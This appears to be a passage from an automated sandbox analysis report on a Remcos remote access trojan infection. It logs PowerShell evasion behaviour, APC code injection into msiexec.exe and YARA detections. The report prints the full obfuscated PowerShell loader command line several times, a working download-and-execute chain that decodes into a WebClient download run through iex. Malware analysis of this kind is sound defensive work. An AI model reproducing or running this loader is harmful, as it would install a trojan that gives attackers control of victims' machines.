              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5383Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4498Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5567Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4302Jump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_10-3068
              Source: C:\ProgramData\Remcos\remcos.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_10-2965
              Source: C:\ProgramData\Remcos\remcos.exeAPI coverage: 7.8 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5308Thread sleep time: -6456360425798339s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7068Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: powershell.exe, 00000002.00000002.2413283912.000001822A1A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_02789219 LdrInitializeThunk,4_2_02789219
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 10_2_003859F2 GetLastError,RegQueryValueExW,RegCloseKey,GlobalFree,RegCreateKeyExW,RegSetValueExW,lstrlenW,RegSetValueExW,RegCloseKey,memset,OutputDebugStringW,SetLastError,10_2_003859F2
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 10_2_00388ADC Sleep,LoadLibraryW,GetProcAddress,10_2_00388ADC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_3_00CBC073 mov eax, dword ptr fs:[00000030h]8_3_00CBC073
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 10_2_003863E3 mov eax, dword ptr fs:[00000030h]10_2_003863E3
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 10_2_00389C10 SetUnhandledExceptionFilter,10_2_00389C10
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 10_2_003895F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_003895F0

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Early bird code injection technique detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_3664.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3664, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2704, type: MEMORYSTR
              Queues an APC in another process (thread injection)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 40C0000Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Sarcosome; function Relationsdatabasemodellen($Omgngelsernes){$Skinfulndustrivirksomheden=4;$Skinful=$Skinfulndustrivirksomheden;do{$Klasselotteriets+=$Omgngelsernes[$Skinful];$Skinful+=5} until(!$Omgngelsernes[$Skinful])$Klasselotteriets}function Woodranger($Henequen){ .($Ludgate) ($Henequen)}$Akvavitters3=Relationsdatabasemodellen 'Vif nS miernketBrid. SliW';$Akvavitters3+=Relationsdatabasemodellen 'Styre OveB dspc.eneL SynICaboEAstinConvt';$grounds=Relationsdatabasemodellen 'Sh,mMsammo ,dhz enbiMindl elpltidsa N,n/';$Komitadji=Relationsdatabasemodellen 'KlebT LowlEft sBrie1Albu2';$Parodi='P al[ oseNcapeeEkspTVild.G.noSBoulELic.RTilbvAmasi Sa.cWindeNon,PGenno BariArchnLi nTTinkmLit.akol N BedaSnekgOrchEB,virLina]Rgni:Fors:SupesInfeERorpcT lsUsp nRVen ivurdt unlyLokaP H lrGastOIndht G nOSti cOpdrOStanLC ha=Gibb$ M rkSlarO Liqm surIPo,tTRe,sAPrehdLa.tJRednI';$grounds+=Relationsdatabasemodellen 'Thr.5Logg.,egl0Ung D,se( RekWBasiiSkrinPremd AlloFasewT lbs win Re mN SveThjem Feri1Denu0swit.meda0Di p;Vand ArpW SeliDiskn ,vi6Inst4Efte;P.os Tocxdobb6 Unp4augu; S,o Or fr Pasvluna:Pa,c1Bldt3Hjer1H mr.Cont0Arch)Fire KnacGFlokeCom cAntik taloDose/Sy p2Inde0Varm1Unde0eigh0Apes1Hexa0Foot1Sacc PrefF PutiDi prClume Kv fStado pylxChil/Fjer1Germ3Unti1Slad.Locu0';$Sinecurist=Relationsdatabasemodellen 'Hemmu M,nsTurkEBio r Per-RetrAT.trgFluoEAn,iNUbnht';$statsretten=Relationsdatabasemodellen 'SpathHjadt pstt AerpskolsUdbo: Fin/ Myt/M veoBetofTurr1Ch oxK ll.GodpiUnjucjouruconr/GoblpSyndnT.ksTA atC Ep.lVaniIJudejschaBSpir/DepeS dowh ineoDecitMartsUniotAnhoaRetrrV nd.Achep Tits ,osd';$Bentjs=Relationsdatabasemodellen 'vilj>';$Ludgate=Relationsdatabasemodellen 'F eeiKo,bEEnk X';$Anticiperede='Filtercigarets';$Gushy='\Knapmagerens.Stu';Woodranger (Relationsdatabasemodellen 'Hyp $FestgUsynL CowOPhasbEr dA DeplBegy:M niBI.niNLystd orpsUncoLLazyeA leTFrejSPibe=Cut.$PjasE uinAlleVAd n:Afsia OliPNavlpO toDJam.aDrjdT derA,ree+T.ea$RenrGBilbUU frS G.khmosey');Woodranger (Relationsdatabasemodellen ' Vil$ Glagh nllDeltoRetrBQuohaBarbLBrn.:ConcMMisaY prASdfilPe.ogPaddiTypecInfr=Ferr$AbiusMarmTSnebaAfruTConcS TekRPlaneHaret port utoe nkNU ie.Depus,nviPOleslPap IHoltTDeal(Exos$Co cB.iogECoornEtt.TSul J SlesItem)');Woodranger (Relationsdatabasemodellen $Parodi);$statsretten=$Myalgic[0];$Pyemesis=(Relationsdatabasemodellen 'Draa$GeckGCo tL garOEf eBFor.AFluil nfa:ReseY Kv oBrugmBioleSkriRPerc=BrugNFif EHalswFors- acOFossBStlgJudvaeNistcCanaTUgen Hov,SDa,ay CansHandTs ineMereM Sce. Nat$,nveAR,inK T.lVDaniaulveVCiseITrkuTC,ndt rygE UndRLavaS Equ3');Woodranger ($Pyemesis);Woodranger (Relationsdatabasemodellen ' omr$Sl pY ,ilos,pem rabeOmplrIrri.Mys HAnace R da JindCouneVentrForvs sek[Duel$UnsuSGaariFordnDok eHjrncprobu Ge.r U riOut,sJobbtGril]Kr,d=Sjl.$IsolgWi.rrConsoStemuDrftnDiphd Stus');$Cricotus=Relationsdatabasemodellen ' Mid$Vi uYChrooLgnemSodeeD cerJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe" Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "echo $sarcosome; function relationsdatabasemodellen($omgngelsernes){$skinfulndustrivirksomheden=4;$skinful=$skinfulndustrivirksomheden;do{$klasselotteriets+=$omgngelsernes[$skinful];$skinful+=5} until(!$omgngelsernes[$skinful])$klasselotteriets}function woodranger($henequen){ .($ludgate) ($henequen)}$akvavitters3=relationsdatabasemodellen 'vif ns miernketbrid. sliw';$akvavitters3+=relationsdatabasemodellen 'styre oveb dspc.enel synicaboeastinconvt';$grounds=relationsdatabasemodellen 'sh,mmsammo ,dhz enbimindl elpltidsa n,n/';$komitadji=relationsdatabasemodellen 'klebt lowleft sbrie1albu2';$parodi='p al[ osencapeeeksptvild.g.nosboulelic.rtilbvamasi sa.cwindenon,pgenno bariarchnli nttinkmlit.akol n bedasnekgorcheb,virlina]rgni:fors:supesinfeerorpct lsusp nrven ivurdt unlylokap h lrgastoindht g nosti copdrostanlc ha=gibb$ m rkslaro liqm suripo,ttre,saprehdla.tjredni';$grounds+=relationsdatabasemodellen 'thr.5logg.,egl0ung d,se( rekwbasiiskrinpremd allofasewt lbs win re mn svethjem feri1denu0swit.meda0di p;vand arpw selidiskn ,vi6inst4efte;p.os tocxdobb6 unp4augu; s,o or fr pasvluna:pa,c1bldt3hjer1h mr.cont0arch)fire knacgflokecom cantik talodose/sy p2inde0varm1unde0eigh0apes1hexa0foot1sacc preff putidi prclume kv fstado pylxchil/fjer1germ3unti1slad.locu0';$sinecurist=relationsdatabasemodellen 'hemmu m,nsturkebio r per-retrat.trgfluoean,inubnht';$statsretten=relationsdatabasemodellen 'spathhjadt pstt aerpskolsudbo: fin/ myt/m veobetofturr1ch oxk ll.godpiunjucjouruconr/goblpsyndnt.ksta atc ep.lvaniijudejschabspir/depes dowh ineodecitmartsuniotanhoaretrrv nd.achep tits ,osd';$bentjs=relationsdatabasemodellen 'vilj>';$ludgate=relationsdatabasemodellen 'f eeiko,beenk x';$anticiperede='filtercigarets';$gushy='\knapmagerens.stu';woodranger (relationsdatabasemodellen 'hyp $festgusynl cowophasber da deplbegy:m nibi.ninlystd orpsuncollazyea letfrejspibe=cut.$pjase uinallevad n:afsia olipnavlpo todjam.adrjdt dera,ree+t.ea$renrgbilbuu frs g.khmosey');woodranger (relationsdatabasemodellen ' vil$ glagh nlldeltoretrbquohabarblbrn.:concmmisay prasdfilpe.ogpadditypecinfr=ferr$abiusmarmtsnebaafrutconcs tekrplaneharet port utoe nknu ie.depus,nvipoleslpap iholttdeal(exos$co cb.iogecoornett.tsul j slesitem)');woodranger (relationsdatabasemodellen $parodi);$statsretten=$myalgic[0];$pyemesis=(relationsdatabasemodellen 'draa$geckgco tl garoef ebfor.afluil nfa:resey kv obrugmbioleskrirperc=brugnfif ehalswfors- acofossbstlgjudvaenistccanatugen hov,sda,ay canshandts inemerem sce. nat$,nvear,ink t.lvdaniaulvevciseitrkutc,ndt ryge undrlavas equ3');woodranger ($pyemesis);woodranger (relationsdatabasemodellen ' omr$sl py ,ilos,pem rabeomplrirri.mys hanace r da jindcouneventrforvs sek[duel$unsusgaarifordndok ehjrncprobu ge.r u riout,sjobbtgril]kr,d=sjl.$isolgwi.rrconsostemudrftndiphd stus');$cricotus=relationsdatabasemodellen ' mid$vi uychroolgnemsodeed cer
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "echo $sarcosome; function relationsdatabasemodellen($omgngelsernes){$skinfulndustrivirksomheden=4;$skinful=$skinfulndustrivirksomheden;do{$klasselotteriets+=$omgngelsernes[$skinful];$skinful+=5} until(!$omgngelsernes[$skinful])$klasselotteriets}function woodranger($henequen){ .($ludgate) ($henequen)}$akvavitters3=relationsdatabasemodellen 'vif ns miernketbrid. sliw';$akvavitters3+=relationsdatabasemodellen 'styre oveb dspc.enel synicaboeastinconvt';$grounds=relationsdatabasemodellen 'sh,mmsammo ,dhz enbimindl elpltidsa n,n/';$komitadji=relationsdatabasemodellen 'klebt lowleft sbrie1albu2';$parodi='p al[ osencapeeeksptvild.g.nosboulelic.rtilbvamasi sa.cwindenon,pgenno bariarchnli nttinkmlit.akol n bedasnekgorcheb,virlina]rgni:fors:supesinfeerorpct lsusp nrven ivurdt unlylokap h lrgastoindht g nosti copdrostanlc ha=gibb$ m rkslaro liqm suripo,ttre,saprehdla.tjredni';$grounds+=relationsdatabasemodellen 'thr.5logg.,egl0ung d,se( rekwbasiiskrinpremd allofasewt lbs win re mn svethjem feri1denu0swit.meda0di p;vand arpw selidiskn ,vi6inst4efte;p.os tocxdobb6 unp4augu; s,o or fr pasvluna:pa,c1bldt3hjer1h mr.cont0arch)fire knacgflokecom cantik talodose/sy p2inde0varm1unde0eigh0apes1hexa0foot1sacc preff putidi prclume kv fstado pylxchil/fjer1germ3unti1slad.locu0';$sinecurist=relationsdatabasemodellen 'hemmu m,nsturkebio r per-retrat.trgfluoean,inubnht';$statsretten=relationsdatabasemodellen 'spathhjadt pstt aerpskolsudbo: fin/ myt/m veobetofturr1ch oxk ll.godpiunjucjouruconr/goblpsyndnt.ksta atc ep.lvaniijudejschabspir/depes dowh ineodecitmartsuniotanhoaretrrv nd.achep tits ,osd';$bentjs=relationsdatabasemodellen 'vilj>';$ludgate=relationsdatabasemodellen 'f eeiko,beenk x';$anticiperede='filtercigarets';$gushy='\knapmagerens.stu';woodranger (relationsdatabasemodellen 'hyp $festgusynl cowophasber da deplbegy:m nibi.ninlystd orpsuncollazyea letfrejspibe=cut.$pjase uinallevad n:afsia olipnavlpo todjam.adrjdt dera,ree+t.ea$renrgbilbuu frs g.khmosey');woodranger (relationsdatabasemodellen ' vil$ glagh nlldeltoretrbquohabarblbrn.:concmmisay prasdfilpe.ogpadditypecinfr=ferr$abiusmarmtsnebaafrutconcs tekrplaneharet port utoe nknu ie.depus,nvipoleslpap iholttdeal(exos$co cb.iogecoornett.tsul j slesitem)');woodranger (relationsdatabasemodellen $parodi);$statsretten=$myalgic[0];$pyemesis=(relationsdatabasemodellen 'draa$geckgco tl garoef ebfor.afluil nfa:resey kv obrugmbioleskrirperc=brugnfif ehalswfors- acofossbstlgjudvaenistccanatugen hov,sda,ay canshandts inemerem sce. nat$,nvear,ink t.lvdaniaulvevciseitrkutc,ndt ryge undrlavas equ3');woodranger ($pyemesis);woodranger (relationsdatabasemodellen ' omr$sl py ,ilos,pem rabeomplrirri.mys hanace r da jindcouneventrforvs sek[duel$unsusgaarifordndok ehjrncprobu ge.r u riout,sjobbtgril]kr,d=sjl.$isolgwi.rrconsostemudrftndiphd stus');$cricotus=relationsdatabasemodellen ' mid$vi uychroolgnemsodeed cer
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "echo $sarcosome; function relationsdatabasemodellen($omgngelsernes){$skinfulndustrivirksomheden=4;$skinful=$skinfulndustrivirksomheden;do{$klasselotteriets+=$omgngelsernes[$skinful];$skinful+=5} until(!$omgngelsernes[$skinful])$klasselotteriets}function woodranger($henequen){ .($ludgate) ($henequen)}$akvavitters3=relationsdatabasemodellen 'vif ns miernketbrid. sliw';$akvavitters3+=relationsdatabasemodellen 'styre oveb dspc.enel synicaboeastinconvt';$grounds=relationsdatabasemodellen 'sh,mmsammo ,dhz enbimindl elpltidsa n,n/';$komitadji=relationsdatabasemodellen 'klebt lowleft sbrie1albu2';$parodi='p al[ osencapeeeksptvild.g.nosboulelic.rtilbvamasi sa.cwindenon,pgenno bariarchnli nttinkmlit.akol n bedasnekgorcheb,virlina]rgni:fors:supesinfeerorpct lsusp nrven ivurdt unlylokap h lrgastoindht g nosti copdrostanlc ha=gibb$ m rkslaro liqm suripo,ttre,saprehdla.tjredni';$grounds+=relationsdatabasemodellen 'thr.5logg.,egl0ung d,se( rekwbasiiskrinpremd allofasewt lbs win re mn svethjem feri1denu0swit.meda0di p;vand arpw selidiskn ,vi6inst4efte;p.os tocxdobb6 unp4augu; s,o or fr pasvluna:pa,c1bldt3hjer1h mr.cont0arch)fire knacgflokecom cantik talodose/sy p2inde0varm1unde0eigh0apes1hexa0foot1sacc preff putidi prclume kv fstado pylxchil/fjer1germ3unti1slad.locu0';$sinecurist=relationsdatabasemodellen 'hemmu m,nsturkebio r per-retrat.trgfluoean,inubnht';$statsretten=relationsdatabasemodellen 'spathhjadt pstt aerpskolsudbo: fin/ myt/m veobetofturr1ch oxk ll.godpiunjucjouruconr/goblpsyndnt.ksta atc ep.lvaniijudejschabspir/depes dowh ineodecitmartsuniotanhoaretrrv nd.achep tits ,osd';$bentjs=relationsdatabasemodellen 'vilj>';$ludgate=relationsdatabasemodellen 'f eeiko,beenk x';$anticiperede='filtercigarets';$gushy='\knapmagerens.stu';woodranger (relationsdatabasemodellen 'hyp $festgusynl cowophasber da deplbegy:m nibi.ninlystd orpsuncollazyea letfrejspibe=cut.$pjase uinallevad n:afsia olipnavlpo todjam.adrjdt dera,ree+t.ea$renrgbilbuu frs g.khmosey');woodranger (relationsdatabasemodellen ' vil$ glagh nlldeltoretrbquohabarblbrn.:concmmisay prasdfilpe.ogpadditypecinfr=ferr$abiusmarmtsnebaafrutconcs tekrplaneharet port utoe nknu ie.depus,nvipoleslpap iholttdeal(exos$co cb.iogecoornett.tsul j slesitem)');woodranger (relationsdatabasemodellen $parodi);$statsretten=$myalgic[0];$pyemesis=(relationsdatabasemodellen 'draa$geckgco tl garoef ebfor.afluil nfa:resey kv obrugmbioleskrirperc=brugnfif ehalswfors- acofossbstlgjudvaenistccanatugen hov,sda,ay canshandts inemerem sce. nat$,nvear,ink t.lvdaniaulvevciseitrkutc,ndt ryge undrlavas equ3');woodranger ($pyemesis);woodranger (relationsdatabasemodellen ' omr$sl py ,ilos,pem rabeomplrirri.mys hanace r da jindcouneventrforvs sek[duel$unsusgaarifordndok 